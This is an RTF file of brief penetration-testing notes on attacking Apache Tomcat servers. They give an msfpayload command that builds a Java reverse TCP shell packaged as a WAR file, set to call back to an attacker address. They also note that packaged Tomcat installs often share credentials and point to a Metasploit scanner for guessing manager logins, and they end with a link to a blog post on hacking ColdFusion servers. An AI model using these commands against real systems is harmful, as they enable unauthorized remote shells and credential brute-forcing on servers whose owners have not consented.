{\rtf1\ansi\ansicpg1252\uc1\deff0
{\fonttbl{\f0\fmodern\fcharset0\fprq2 Courier New;}}
{\colortbl;\red0\green0\blue0;\red255\green255\blue255;}
\paperw12240\paperh15840\margl1800\margr1800\margt1440\margb1440\fet2\ftnbj\aenddoc
\pgnrestart\pgnstarts0
\pard\plain \ltrch\loch \f0\fs24
\par\pard\plain \fi720\ltrch\loch \f0\fs24\b0\i0
\par\plain {\f0\fs24\b0\i0 Generating payload for Tomcat }
\par\plain {\f0\fs24\b0\i0 msfpayload java/shell/reverse_tcp LHOST=192.168.1.6 W > colesec.war}
\par\plain \f0\fs24\b0\i0
\par\plain \f0\fs24\b0\i0
\par\plain {\f0\fs24\b0\i0 Tomcat does not have default creds however, when packaged up, it generally has creds similar across distributions.}
\par\pard\plain \ltrch\loch {\f0\fs24\b0\i0 Use auxiliary/scanner/http/tomcat_mgr_login}
\par\plain \f0\fs24\b0\i0
\par\plain \f0\fs24\b0\i0
\par\plain {\f0\fs24\b0\i0 http://kaoticcreations.blogspot.com/2012/11/hacking-cold-fusion-servers-part-i.html}}